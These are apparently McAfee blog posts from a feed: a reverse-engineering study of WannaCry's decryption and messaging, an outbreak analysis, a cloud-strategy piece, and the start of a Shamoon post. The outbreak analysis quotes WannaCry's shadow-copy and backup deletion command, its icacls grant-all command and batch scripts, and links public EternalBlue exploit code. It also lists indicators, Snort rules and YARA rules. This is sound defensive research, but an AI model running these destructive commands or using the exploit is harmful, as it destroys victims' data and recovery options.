Is WannaCry Really Ransomware? https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/wannacry-really-ransomware/ https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/wannacry-really-ransomware/#respond Thu, 08 Jun 2017 16:26:14 +0000 https://securingtomorrow.mcafee.com/?p=74857 Ransomware follows a relatively simple model: data is encrypted, the victim pays, data is decrypted. At least that is what those who create ransomware want you to believe. This was also our assumption when we began our analysis of WannaCry—that those behind the campaign would decrypt victims’ data once they received payment. However, for a campaign with incredibly effective propagation techniques, reasonable key and data management, and a working anonymous communication fabric with Bitcoin payments, we found a major flaw: The WannaCry attackers appear to be unable to determine which users have paid the ransom and they cannot decrypt on a per-user basis.

The post Is WannaCry Really Ransomware? appeared first on McAfee Blogs.

]]>
This post summarizes the significant efforts of a McAfee threat research team that has been relentless in its efforts to gain a deeper understanding of the WannaCry ransomware. We would like to specifically acknowledge Christiaan Beek, Lynda Grindstaff, Steve Grobman, Charles McFarland, and Kunal Mehta for their efforts.

Ransomware follows a relatively simple model: data is encrypted, the victim pays, data is decrypted. At least that is what those who create ransomware want you to believe. This was also our assumption when we began our analysis of WannaCry—that those behind the campaign would decrypt victims’ data once they received payment. However, for a campaign with incredibly effective propagation techniques, reasonable key and data management, and a working anonymous communication fabric with Bitcoin payments, we found a major flaw: The WannaCry attackers appear to be unable to determine which users have paid the ransom and they cannot decrypt on a per-user basis.

Technical summary

Our analysis into the encryption and decryption functions within WannaCry reveals an effective tool set. The authors:

  • Created an 8-byte unique identifier (via CryptGenRandom) that identifies the current machine and all the encrypted files on that machine. This ID is used in all communications with the back end and is intended to allow per-user decryption. (See “Can the attackers be contacted?” for details.)
  • Practiced reasonable data sanitization techniques to prevent the recovery of key material. (See “Does WannaCry prevent recovery of key material?”)
  • Followed reasonable practices to prevent the recovery of plain-text file data. (See “Does WannaCry prevent recovery of file data?”)
  • Developed a (somewhat unreliable) back end that keeps track of which users have encrypted files. (See “Can the authors respond? Can they return a private key?”)
  • Made file decryption possible, provided that the “Check Payment” interaction with the back end results in the decrypted key being written to 00000000.dky. The authors know if the returned data is a key or a message to be displayed to the user. The authors must have tested this at least once, and have thus tested full decryption where the need for the correct private key was clearly known. (See “Recovering the user’s private key”)
  • WannaCry appears to have been written by (at least] two authors or teams with different motives:
    • One author favored Win32 APIs and wrapping those APIs or using object orientation.
    • The other author favored C, common APIs (such as fopen), and long procedural functions. They may have been responsible for weaponizing the file encryptor/decryptor, but we do not know. If we are correct, this code probably introduced the unique ID idea but the interface was not updated to include a way to associate the ID with the user’s Bitcoin wallet.

The WannaCry authors demonstrated good technical governance, for example, the key handling, buffer sanitization, and private key security on disk using a strongly encrypted format. It is odd that with such good governance, the same group neglected to include something as essential as a unique ID for a user (or instance of attack) because this is mandatory to decrypt a specific user’s files. While much of the initial analysis described the WannaCry campaign as “shoddy,” the use of good technical governance suggests that there are elements of this campaign that are well implemented.

This competence raises doubts that the campaign was shoddy. Given the level of capability demonstrated, we would expect the developers would have found and fixed basic errors. Indeed, could the inclusion of these basic errors be an attempt to make the campaign appear amateur? Without apprehending those behind the campaign, it is impossible to know their motivation; yet a thorough analysis of the technical artefacts questions the shoddy theory.

 

Motivations

What were the attackers’ motives? Is this real ransomware or something else? For a particular ransomware family to make money in the long term, it must be able to encrypt and decrypt files, and have a reputation that once payment is sent, data can be recovered.

We have identified three potential motives:

  • To make money
    • WannaCry has the key components required for a financially successful campaign—including propagation, key management, data sanitization techniques to prevent data and key recovery, anonymous payment, and messaging and decryption infrastructure.
    • To keep ransom payments flowing, the authors used current messaging infrastructure to ask users to send their Bitcoin wallet IDs to the attackers. This is the same messaging infrastructure that ultimately delivers the user’s private key, allowing full decryption.
    • However, there is limited evidence from the field that payment yields data decryption.
  • To test key components of the ransomware
    • This is likely because the malware contains almost no reverse engineering and debugging protection.
    • We have already seen new WannaCry variants that are harder to analyze because components download 24 hours or so after infection time.
  • To disrupt
    • Ransomware as a destructive mechanism. The use of ransomware to destroy or generate noise, though not common, would be a particularly effective tactic.

Determining the authors intent is not trivial, and likely not possible with the information available. However, to get closer to an answer, the question we need to answer is whether WannaCry is fully functional. Analyzing that leads to a few detailed questions that we explored:

  • Can WannaCry decrypt files?
  • Can the authors be contacted?
  • Can the authors respond? Can they return a private key?
  • Does WannaCry prevent the recovery of files?
  • Does WannaCry prevent the recovery of key material?

Is WannaCry fully functional?

WannaCry can communicate with a back end that maintains its state and prevents the recovery of key material and file data. If one has the user’s private key, the user’s data can be recovered. Despite its bugs and design issues, WannaCry is effective. It is not high quality or well implemented, but it is  effective.

Can WannaCry decrypt files?

The short answer is Yes. WannaCry’s encryption, key management, and file formats have been documented by McAfee Labs, so we will not cover that here. Instead, we will focus on the decryption tool, which we know makes use of the following API sets:

  • Microsoft’s crypto APIs.
    • CryptGenKey, CryptGenRandom, CryptExportKey, CryptImportKey, CryptEncrypt, CryptDecrypt, etc.
  • Microsoft’s file management APIs.
    • CreateFileW, ReadFile, WriteFile, CloseHandle, etc.
  • C runtime library file APIs
    • fopen, fread, fwrite, fflush, fclose, etc.

Using WinDbg or IDA Pro, we can set conditional breakpoints on the APIs used by @WanaDecryptor@.exe and dump out useful information. Given the lack of debugging protection in the ransomware, this is one of the fastest ways to understand WannaCry’s behavior.

Sample decryption

To encourage users to pay the ransom, the decryption tool @WanaDecryptor@.exe can decrypt a small number of files for free. After the “free” files have been decrypted, the decryptor looks for the file 00000000.dky, which should contain the user’s private key. If found, this key is used to decrypt all files on the system. If we have the user’s private key, can we decrypt all files?

Recovering the user’s private key

To prove that decryption is possible, we need the private key:

  • Break on CryptGenKey and get the handle to any created key pair.
  • Break on CryptExportKey and watch the export of the public and private keys to memory.
    • Here we can steal the private key and check if decryption works.
  • [Optionally] put break points showing the encryption of the private key with the attacker’s public key (hardcoded within the encryptor binary), and save it to disk in 00000000.eky.

To analyze the key creation, we can use the following breakpoints:

Figure 1: Crypto API breakpoints for key import and export.

As WannaCry initializes, it calls CryptGenKey to generate a new random key, the handle to which is returned in the fourth parameter.


Figure 2: Creating a new random key.

Next, WannaCry exports the public key from the generated key and saves it to the file 00000000.eky. Note the presence of 0x06 and RSA1. This indicates that the exported key blob is a public key. To view the key blob, save the address of the buffer and buffer size in temporary registers, allow the function to return, and dump the key blob using the address and size values from the temporary registers.

Figure 3: Capturing the user’s public key.

Next, WannaCry exports the private-public key pair to memory. Note the presence of 0x07 and RSA2 in the exported buffer.

Figure 4: Capturing the user’s private-public key pair.

Immediately afterward, WannaCry encrypts the user’s private key with the attacker’s public key and writes the file to 00000000.eky. The contents of this file are sent to the attackers when the user clicks “Check Payment” (as discussed further in “Can the attackers be contacted?”).

At this moment, the private-public key pair is easily recoverable, so we can issue a command to dump that memory to a file, as shown below:

Figure 5: Writing the private key to disk from WinDbg.

In Figure 5, we have given the private key almost the correct name. If the file 00000000.dky exists and contains a valid private key that can decrypt files, WannaCry will abort its encryption run. To decrypt files, rename the file to 00000000.dky once all files have been encrypted, and click on Decrypt.

Figure 6: Dialog after WannaCry successfully decrypts all files.

Based on this analysis, WannaCry is capable of per-user decryption, provided that WannaCry can send the user’s private key to the back end, receive the private decrypted key, and place it in the correct location.

 

Can the attackers be contacted?

WannaCry provides two methods of communication with the attackers: the “Contact Us” link and the “Check Payment” button on the main decryptor interface, shown below in Figure 7.

Figure 7: WannaCry’s Decryptor interface.

If WannaCry allowed recovery, both interface controls should function. Assuming that all communication is over standard network sockets, we can inspect the traffic in real time using WinDbg/IDA Pro with the breakpoints in Figure 8.

Figure 8: Breakpoints for analyzing network traffic.

Our goal is to determine what is being sent to and received from the back end. The detail is not shown here, but WannaCry makes use of TOR to anonymize communications with the attackers, cycling through many TOR servers. We looked for the user’s private key being sent to the back end, where we expected it to be decrypted and sent back if the user had paid the ransom (or if the attackers had decided to randomly decrypt a user’s key). We found one message that was large enough. An example is shown in Figure 9.

Figure 9: A large and interesting buffer sent to the back end.

However, the data did not match any part of the user’s private key stored on disk; could this communication be encrypted? Looking at the call stack, we saw several frames:

Figure 10: Post encryption send call stack.

Looking at the previous frame, we saw a simple wrapper around ws2_32!send, so this is not an encryptor.

Figure 11: ws2_32!send wrapper.

Looking at the frame before the send wrapper in Figure 11, we found a reasonably long function beginning at 0x0040d300 that appears to be responsible for obfuscating the buffer, and we confirmed that using IDA Pro with a second breakpoint, as shown below:

Figure 12: Message obfuscator function breakpoint.

Rerunning our Check Payment debugging run, our new breakpoint fired and revealed the message to be sent prior to obfuscation:


Figure 13: Message to be sent to back end.

The message encodes information that identifies the user. We color-coded the message components in Figures 13 and 15:

  • Green: The 8-byte unique ID stored in the first 8 bytes of 00000000.res. This is created by a call to CryptGenRandom during WannaCry’s initialization and persists for the life of the attack.
  • Orange: The computer name retrieved with GetComputerNameA.
  • Red: The user’s name retrieved by GetUserNameA.
  • Bold: The Bitcoin wallet ID that the user should have sent money to, and the amount that the user should have paid.
  • Cyan: The encrypted user’s private key as read from 00000000.eky.

Based on the message content, it is reasonable to assert that the attacker’s back end receives all the information required to identify users who have paid the ransom, and should be able to perform per-user decryption, provided there is a mechanism for users to tie their Bitcoin transfers to the 8-byte unique ID that represents their specific encryption instance. However, we found no mechanism to do this and there are no interface elements or instructions to help.

Running the same experiment using the Contact Us interface shown in Figure 14, we sent a message “Hey! Can I have my files back?” to the attackers, and using our breakpoint from Figure 12, we determined that a common messaging framework is used.

Figure 14: Messaging interface.


Figure 15: Message sent to back end.

The results in Figure 15 show:

  • Both Check Payment and Contact Us appear to use a common messaging format
    • 8-byte unique ID, machine name, username is always sent.
    • The payload can vary according to message type.

As a result, we conclude that the attackers should have been able to uniquely identify a user but they clearly omitted a mechanism to tie a payment to an ID, making per-user decryption technically impossible.

Can the authors respond? Can they return a private key?

Shortly after its release, Check Payment began returning a message to users instructing them to use the Contact Us mechanism to send the users’ Bitcoin wallet addresses, as shown in Figure 16.

Figure 16: Request for a Bitcoin wallet address.

This message confirms that the attackers can respond. It also gives us an opportunity to analyze the flow of Check Payment messages. Using the same send and recv breakpoints from Figure 8, we received the following obfuscated message:

Figure 17: Encrypted response received from attackers.

Using the following breakpoint, we then watched for that data being written to the obfuscated buffer; if the obfuscation removal occurs in place, we should be able to look at the decrypted buffer.

Figure 18: Message decryption breakpoint.

Once the breakpoint fires, we saw that the message was modified in place:

Figure 19: In-place decryption of the encrypted message.

Our analysis of the function in question in WinDbg and IDA Pro indicated that on return the message was in plain text. Issuing the gu command to step out of the function, we saw the message decrypted, as shown in Figure 20.

Figure 20: Decrypted check-payment message.

This is the same message that we saw displayed in the dialog box, so end-to-end communication is working. But, how is this message used? Again, we made use of a hardware breakpoint, as shown in Figure 21.

Figure 21: Hardware breakpoint to track the decrypted message.

The preceding breakpoint triggers during a call to fwrite to 0000000.dky; the message is written to a file that should contain the user’s private key, as shown below in a subsequent call to WriteFile as part of fwrite, fflush.

Figure 22: Entire message being written to 00000000.dky

The entire message, or whatever was sent back to the decryptor, is written to the file 00000000.dky. Thus we conclude that Check Payment should return a crypto API key blob for the user’s private key. By enabling our key import breakpoint shown in Figure 1, we verified this, as shown below:

Figure 23: The decrypted message imported as a key in CryptImportKey.

Note the value of eax at the bottom of Figure 23 after CryptImportKey has returned: eax is 0, which means that CryptImportKey failed. If CryptImportKey fails, then WannaCry eventually deletes 00000000.dky and displays the message to the user. If CryptImportKey succeeds, the user can successfully decrypt all the files.

From this analysis, we conclude:

  • The WannaCry communication fabric is active and can return messages.
  • The WannaCry back end is live and tracking users because the help message is returned only once.
  • The WannaCry client expects that a message or private key can be returned from the back end:
    • If the message is not a private key (CryptImportKey fails), the client assumes the message is text that should be shown to the user.
    • Private keys are left on disk in 00000000.dky and allow the user to decrypt their files.

Decryption does not work because the authors omitted a link between payment and the unique ID. But what happens if a user follows the instructions and sends the Bitcoin wallet ID to the attackers? Can the victim decrypt files? So far, a tiny sample of victims have reported the decryption of files, but this appears not to be tied to the payment-making function.

Although the message indicates that a user may be able to get the files back (which supports the theory of shoddy design), our limited testing indicated that decryption keys are not returned and files cannot be restored even after payment, which adds weight to the possibility that WannaCry is a prank or test.

 

Does WannaCry prevent recovery of file data?

Yes and no. There has been a lot of excellent research showing that in some circumstances, files are recoverable:

  • Files on removable and nonsystem volumes.
  • Read-only files.
  • Temporary files.

Files stored in the Desktop and Documents folders are the hardest to recover. What does this mean for our theories? Both are still supported:

  • Developer incompetence: Incorrectly deleting and overwriting original files indicates a hurried or poor engineer.
    • There is a difference between not realizing that per-user file decryption can never work without the unique ID and running into filesystem processing bugs for large batch operations; errors in batch processing are much easier to explain.
  • Prank: The techniques for preventing recovery support the theory that the developers did not go to great lengths to prevent recovery from unpredictable folders and devices:
    • Removable, network, and fixed nonsystem volumes may support file carving as a recovery technique. This is also true for devices that make use of wear leveling.
    • Online storage folders and some versioning tools may provide alternative recovery mechanisms for files.
    • Desktop and documents folders are commonly file locations. Many users would not be able to recover most of their files.

We do not believe that WannaCry file data recovery prevention strongly supports either thesis.

 

Does WannaCry prevent recovery of key material?

The most important key for data recovery is the user’s private key. We used hardware breakpoints to see what happens to the exported key blob in our earlier example, as shown below:

Figure 24: Hardware breakpoint to trigger on writes to the key blob.

When this breakpoint fires, we found the following code zeroing out the exported key blob:

Figure 25: Assembly of code that modifies the exported key blob.

Thanks to care taken with data sanitization (such as that shown in Figure 25) and the correct use of CryptDestroyKey, WannaCry keeps the user’s private key in a nonencrypted form for the shortest possible time. Thus private key recovery is impractical beyond exploiting issues in the Windows APIs (as described by other authors).

Although the attacker’s motive may remain unknown for some time, we commend the response from victims, who have generally decided to not pay. Our research continues into this campaign; we will release more data as more information arises.

The post Is WannaCry Really Ransomware? appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/wannacry-really-ransomware/feed/ 0
An Analysis of the WannaCry Ransomware Outbreak https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/analysis-wannacry-ransomware-outbreak/ https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/analysis-wannacry-ransomware-outbreak/#comments Fri, 12 May 2017 22:07:01 +0000 https://securingtomorrow.mcafee.com/?p=73946 Charles McFarland was a coauthor of this blog. Over the course of Friday, May 12 we received multiple reports of organizations across multiple verticals being victim to a ransomware attack. By Friday afternoon, McAfee’s Global Threat Intelligence system was updated to identify all known WannaCry samples and the company had delivered DAT signature updates to […]

The post An Analysis of the WannaCry Ransomware Outbreak appeared first on McAfee Blogs.

]]>
Charles McFarland was a coauthor of this blog.

Over the course of Friday, May 12 we received multiple reports of organizations across multiple verticals being victim to a ransomware attack. By Friday afternoon, McAfee’s Global Threat Intelligence system was updated to identify all known WannaCry samples and the company had delivered DAT signature updates to all its customers. But the wave of attacks ranks as one of the most notable cyber events in history.

Once infected, the encrypted files contain the file extension .WNCRYT. Victims’ computers then proceed to display the following message with a demand for $300 to decrypt the files.

Observations

Exploit MS17-010:

The malware is using the MS17-010 exploit to distribute itself. This is a SMB vulnerability with remote code execution options. Details at https://technet.microsoft.com/en-us/library/security/ms17-010.aspx . Exploit code is available on multiple sites, including this example: https://github.com/RiskSense-Ops/MS17-010/blob/master/exploits/eternalblue/ms17_010_eternalblue.rb.

This exploit is also known as the Equation Group’s ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers a couple of weeks ago.

With MS17-010, the attacker can use just one exploit to get remote access with system privileges, meaning both steps (Remote Code Execution +Local Privilege Escalation combined) use just one bug in the SMB protocol. Analyzing the exploit code in Metasploit, a popular hacking tool, we see the exploit uses KI_USER_SHARED_DATA, which has a fixed memory address (0xffdff000 on 32-bit Windows) to copy the payload and transfer control to it later.

By remotely gaining control over a victim’s PC with system privileges without any user action, the attacker can spray this malware in the local network by having control over one system inside this network (gaining control over all systems that are not fixed and are affected by this vulnerability), and that one system will spread the ransomware to all vulnerable Windows systems not patched for MS17-010.

Behavior

By using command-line commands, the Volume Shadow copies and backups are removed:

Cmd /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

File size of the ransomware is 3.4MB (3514368 bytes).

Authors called the ransomware WANNACRY—the string hardcoded in samples.

Ransomware is writing itself into a random character folder in the ProgramData folder with the filename tasksche.exe or in the C:\Windows\ folder with the filename mssecsvc.exe and tasksche.exe.

Examples

C:\ProgramData\lygekvkj256\tasksche.exe

C:\ProgramData\pepauehfflzjjtl340\tasksche.exe

C:\ProgramData\utehtftufqpkr106\tasksche.exe

c:\programdata\yeznwdibwunjq522\tasksche.exe

C:\ProgramData\uvlozcijuhd698\tasksche.exe

C:\ProgramData\pjnkzipwuf715\tasksche.exe

C:\ProgramData\qjrtialad472\tasksche.exe

c:\programdata\cpmliyxlejnh908\tasksche.exe

 

The ransomware grants full access to all files by using the command:

Icacls . /grant Everyone:F /T /C /Q

 

Using a batch script for operations:

176641494574290.bat 

 

Content of batch file (fefe6b30d0819f1a1775e14730a10e0e)

echo off

echo SET ow = WScript.CreateObject(“WScript.Shell”)> m.vbs

echo SET om = ow.CreateShortcut(“C:\

WanaDecryptor

.exe.lnk”)>> m.vbs

echo om.TargetPath = “C:\

WanaDecryptor

.exe”>> m.vbs

echo om.Save>> m.vbs

cscript.exe //nologo m.vbs

del m.vbs

del /a %0

Content of M.vbs

SET ow = WScript.CreateObject(“WScript.Shell”)

SET om = ow.CreateShortcut(“C:\

WanaDecryptor

.exe.lnk”)

om.TargetPath = “C:\

WanaDecryptor

om.Save

 

Indicators of compromise

Hashes

dff26a9a44baa3ce109b8df41ae0a301d9e4a28ad7bd7721bbb7ccd137bfd696

201f42080e1c989774d05d5b127a8cd4b4781f1956b78df7c01112436c89b2c9

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

c365ddaa345cfcaff3d629505572a484cff5221933d68e4a52130b8bb7badaf9

09a46b3e1be080745a6d8d88d6b5bd351b1c7586ae0dc94d0c238ee36421cafa

b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

aae9536875784fe6e55357900519f97fee0a56d6780860779a36f06765243d56

21ed253b796f63b9e95b4e426a82303dfac5bf8062bfe669995bde2208b360fd

2372862afaa8e8720bc46f93cb27a9b12646a7cbc952cc732b8f5df7aebb2450

24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c

f8812f1deb8001f3b7672b6fc85640ecb123bc2304b563728e6235ccbe782d85

4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79

4b76e54de0243274f97430b26624c44694fbde3289ed81a160e0754ab9f56f32

9cc32c94ce7dc6e48f86704625b6cdc0fda0d2cd7ad769e4d0bb1776903e5a13

78e3f87f31688355c0f398317b2d87d803bd87ee3656c5a7c80f0561ec8606df

be22645c61949ad6a077373a7d6cd85e3fae44315632f161adc4c99d5a8e6844

5d26835be2cf4f08f2beeff301c06d05035d0a9ec3afacc71dff22813595c0b9

76a3666ce9119295104bb69ee7af3f2845d23f40ba48ace7987f79b06312bbdf

fc626fe1e0f4d77b34851a8c60cdd11172472da3b9325bfe288ac8342f6c710a

eeb9cd6a1c4b3949b2ff3134a77d6736b35977f951b9c7c911483b5caeb1c1fb

043e0d0d8b8cda56851f5b853f244f677bd1fd50f869075ef7ba1110771f70c2

57c12d8573d2f3883a8a0ba14e3eec02ac1c61dee6b675b6c0d16e221c3777f4

ca29de1dc8817868c93e54b09f557fe14e40083c0955294df5bd91f52ba469c8

f7c7b5e4b051ea5bd0017803f40af13bed224c4b0fd60b890b6784df5bd63494

3e6de9e2baacf930949647c399818e7a2caea2626df6a468407854aaa515eed9

9b60c622546dc45cca64df935b71c26dcf4886d6fa811944dbc4e23db9335640

5ad4efd90dcde01d26cc6f32f7ce3ce0b4d4951d4b94a19aa097341aff2acaec

24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c

12d67c587e114d8dde56324741a8f04fb50cc3160653769b8015bc5aec64d20b

85ce324b8f78021ecfc9b811c748f19b82e61bb093ff64f2eab457f9ef19b186

3f3a9dde96ec4107f67b0559b4e95f5f1bca1ec6cb204bfe5fea0230845e8301

 

IP Addresses

  • 197.231.221.221:9001
  • 128.31.0.39:9191
  • 149.202.160.69:9001
  • 46.101.166.19:9090
  • 91.121.65.179:9001
  • 2.3.69.209:9001
  • 146.0.32.144:9001
  • 50.7.161.218:9001
  • 217.79.179.177:9001
  • 213.61.66.116:9003
  • 212.47.232.237:9001
  • 81.30.158.223:9001
  • 79.172.193.32:443
  • 38.229.72.16:443

Domains

  • iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com (sinkholed)
  • Rphjmrpwmfv6v2e[dot]onion
  • Gx7ekbenv2riucmf[dot]onion
  • 57g7spgrzlojinas[dot]onion
  • xxlvbrloxvriy2c5[dot]onion
  • 76jdd2ir2embyv47[dot]onion
  • cwwnhwhlz52maqm7[dot]onion

Filenames

  • @Please_Read_Me@.txt
  • @WanaDecryptor@.exe
  • @WanaDecryptor@.exe.lnk
  • Please Read Me!.txt (Older variant)
  • C:\WINDOWS\tasksche.exe
  • C:\WINDOWS\qeriuwjhrf
  • 131181494299235.bat
  • 176641494574290.bat
  • 217201494590800.bat
  • [0-9]{15}.bat #regex
  • !WannaDecryptor!.exe.lnk
  • 00000000.pky
  • 00000000.eky
  • 00000000.res
  • C:\WINDOWS\system32\taskdl.exe

 

Bitcoin Wallets

  • 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
  • 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94
  • 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw
Here is a snort rule submitted to Sans from Marco Novak:

alert tcp $HOME_NET 445 -> any any (msg:”ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response”; flow:from_server,established; content:”|00 00 00 31 ff|SMB|2b 00 00 00 00 98 07 c0|”; depth:16; fast_pattern; content:”|4a 6c 4a 6d 49 68 43 6c 42 73 72 00|”; distance:0; flowbits:isset,ETPRO.ETERNALBLUE; classtype:trojan-activity; sid:2024218; rev:2;)

And other SNORT rules from Emerging Threats:

(http://docs.emergingthreats.net/bin/view/Main/2024218)

alert smb any any -> $HOME_NET any (msg:”ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Request (set)”; flow:to_server,established; content:”|00 00 00 31 ff|SMB|2b 00 00 00 00 18 07 c0|”; depth:16; fast_pattern; content:”|4a 6c 4a 6d 49 68 43 6c 42 73 72 00|”; distance:0; flowbits:set,ETPRO.ETERNALBLUE; flowbits:noalert; classtype:trojan-activity; sid:2024220; rev:1;)

alert smb $HOME_NET any -> any any (msg:”ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response”; flow:from_server,established; content:”|00 00 00 31 ff|SMB|2b 00 00 00 00 98 07 c0|”; depth:16; fast_pattern; content:”|4a 6c 4a 6d 49 68 43 6c 42 73 72 00|”; distance:0; flowbits:isset,ETPRO.ETERNALBLUE; classtype:trojan-activity; sid:2024218; rev:1;)

 

Yara:

rule wannacry_1 : ransom

{

meta:

author = “Joshua Cannell”

description = “WannaCry Ransomware strings”

weight = 100

date = “2017-05-12”

 

Strings:

$s1 = “Ooops, your files have been encrypted!” wide ascii nocase

$s2 = “Wanna Decryptor” wide ascii nocase

$s3 = “.wcry” wide ascii nocase

$s4 = “WANNACRY” wide ascii nocase

$s5 = “WANACRY!” wide ascii nocase

$s7 = “icacls . /grant Everyone:F /T /C /Q” wide ascii nocase

 

Condition:

any of them

}

rule wannacry_2{

meta:

author = “Harold Ogden”

description = “WannaCry Ransomware Strings”

date = “2017-05-12”

weight = 100

strings:

$string1 = “msg/m_bulgarian.wnry”

$string2 = “msg/m_chinese (simplified).wnry”

$string3 = “msg/m_chinese (traditional).wnry”

$string4 = “msg/m_croatian.wnry”

$string5 = “msg/m_czech.wnry”

$string6 = “msg/m_danish.wnry”

$string7 = “msg/m_dutch.wnry”

$string8 = “msg/m_english.wnry”

$string9 = “msg/m_filipino.wnry”

$string10 = “msg/m_finnish.wnry”

$string11 = “msg/m_french.wnry”

$string12 = “msg/m_german.wnry”

$string13 = “msg/m_greek.wnry”

$string14 = “msg/m_indonesian.wnry”

$string15 = “msg/m_italian.wnry”

$string16 = “msg/m_japanese.wnry”

$string17 = “msg/m_korean.wnry”

$string18 = “msg/m_latvian.wnry”

$string19 = “msg/m_norwegian.wnry”

$string20 = “msg/m_polish.wnry”

$string21 = “msg/m_portuguese.wnry”

$string22 = “msg/m_romanian.wnry”

$string23 = “msg/m_russian.wnry”

$string24 = “msg/m_slovak.wnry”

$string25 = “msg/m_spanish.wnry”

$string26 = “msg/m_swedish.wnry”

$string27 = “msg/m_turkish.wnry”

$string28 = “msg/m_vietnamese.wnry”

condition:

any of ($string*)

}

 

McAfee urges all its customers to ensure McAfee’s DAT updates have been applied to ensure the latest protection. We furthermore advise customers to be diligent in applying security updates for all the software solutions they use.

For more information on McAfee’s response to WannaCry, please read this Knowledge Center article.

The post An Analysis of the WannaCry Ransomware Outbreak appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/analysis-wannacry-ransomware-outbreak/feed/ 5
CIOs: You need to have the cloud talk with your staff https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/cios-need-cloud-talk-staff/ https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/cios-need-cloud-talk-staff/#respond Mon, 08 May 2017 16:15:23 +0000 https://securingtomorrow.mcafee.com/?p=73656 CIOs, it is time to have a frank and open discussion with your staff. This conversation may be difficult or awkward, as it involves topics such as consent, privacy, and appropriate protection. Yes, you need to speak with your staff about the organization’s cloud strategy, and any deployment or security issues that they are facing. […]

The post CIOs: You need to have the cloud talk with your staff appeared first on McAfee Blogs.

]]>
CIOs, it is time to have a frank and open discussion with your staff. This conversation may be difficult or awkward, as it involves topics such as consent, privacy, and appropriate protection. Yes, you need to speak with your staff about the organization’s cloud strategy, and any deployment or security issues that they are facing.

Cloud First strategies are predominantly driven from the top-down, per McAfee’s 2017 cloud adoption and security report  However, for many of the organizations involved in the study, there appears to be a slight disconnect between the C-suite and staff. Overall, C-level executives, such as CIOs, CSOs, and CISOs, displayed a more positive attitude towards cloud-based operations than the non-executive respondents.

Within your organization, it is important to uncover any gaps in perception and determine what is causing them. Are the reasons for a Cloud First strategy not getting clearly communicated down the chain? Are your staff seeing operational issues that are not making it to your office? Or is your staff concerned that cloud adoption is putting their jobs at risk.

The McAfee 2017 cloud study provides some valuable clues and discussion points for your staff meeting. Based on the survey results, 92% of execs stated that they are following a Cloud First strategy, but only 80% of staff agreed. There were also significant gaps in the number and types of cloud services in use, amount of sensitive data stored in the cloud, and plans for future cloud investments. An organization-wide inventory of cloud services in use, data types and locations, and budgets would be an excellent way to start the meeting. The results of this inventory will likely surprise most people in the room, and form the foundation for a discussion of operational and staffing concerns.

According to the survey, the biggest gaps in operational concerns between staff and executives relate to costs, compliance, unauthorized access, and Shadow IT. Staff were more concerned about costs than executives, which may be directly related to lack of information about budget plans, mentioned above. However, staff were also more concerned about unauthorized access to sensitive data and their ability to maintain compliance with regulations than the execs. These concerns should be the focus of a deep dive across the organization, to identify whether there are significant gaps in security and privacy controls. At the same time, executives were more concerned about Shadow IT than staff. When Shadow IT apps are found, staff were more likely to favor blocking access to unauthorized applications, while execs preferred data loss prevention tools. Depending on the results of y our discussion, clear communication throughout the organization about the risks and consequences of Shadow IT appears to be needed.

Finally, staff may feel that they lack the necessary job skills for a Cloud-First IT department. Over half of the executives reported that they have slowed their cloud adoption due to a skills shortage, and almost a third reported that they are continuing despite a skills shortage. However, the execs ranked this concern lower than staff did, which may be inadvertently sending the message down the chain that staffing changes are coming. Based on earlier research from McAfee, it is easier and more effective to invest in security training for existing staff than to find and hire experienced security professionals.

The transformation to cloud services is having a significant impact on the efficiency and effectiveness of organizations of all sizes, and the IT department is probably impacted more than most. Based on the results of this study, there are some small but possibly significant gaps between C-level executives and their staff, that should be addressed before they impact the organization’s security posture.

For more details on cloud adoption and security, download the 2017 McAfee cloud report, Building Trust in a Cloudy Sky.

The post CIOs: You need to have the cloud talk with your staff appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/cios-need-cloud-talk-staff/feed/ 0
The State of Shamoon: Same Actor, Different Lines https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/state-shamoon-actor-different-lines/ https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/state-shamoon-actor-different-lines/#respond Wed, 26 Apr 2017 05:01:39 +0000 https://securingtomorrow.mcafee.com/?p=72669 Naming the recent data-wiping attacks in Saudi Arabia as a continuation of the Shamoon campaign suggests that we are dealing with identical malware and procedures. However, there are fundamental differences between the campaigns of 2012 and 2016‒17, and these differences provide a fascinating insight into the development process of the attackers. When we look at […]

The post The State of Shamoon: Same Actor, Different Lines appeared first on McAfee Blogs.

]]>
Naming the recent data-wiping attacks in Saudi Arabia as a continuation of the Shamoon campaign suggests that we are dealing with identical malware and procedures. However, there are fundamental differences between the campaigns of 2012 and 2016‒17, and these differences provide a fascinating insight into the development process of the attackers.

When we look at this campaign from a high level (preceding image) and at the shared characteristics (in red), we find quite a lot in common. Let’s examine in more detail:

When we look more closely into the phases of the cyberattack “kill chain,” and their modus operandi, we see differences that lead to more questions, as well as interesting findings.

Reconnaissance

In the reconnaissance phase of the 2012 attacks, the adversaries used scanning tools and a pirated copy of penetration-testing software Acunetix Security Scanner to find possible vulnerabilities on the victims’ outward-facing servers. An example of this scanning follows in an excerpt from an intrusion detection system log:

After finding a possible exploit, the adversaries uploaded web shells to gain remote access and used the web shells’ functionality to harvest usernames and credentials.

